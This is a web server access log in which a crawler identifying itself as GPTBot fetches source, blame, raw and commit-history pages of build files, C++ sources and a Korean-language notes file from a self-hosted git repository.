"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15613] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" +[17/Feb/2026:15:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15615] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:15:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10292] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204055] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10525] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202128] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16084] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16086] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16087] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10525] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10527] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204056] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204058] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18935] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 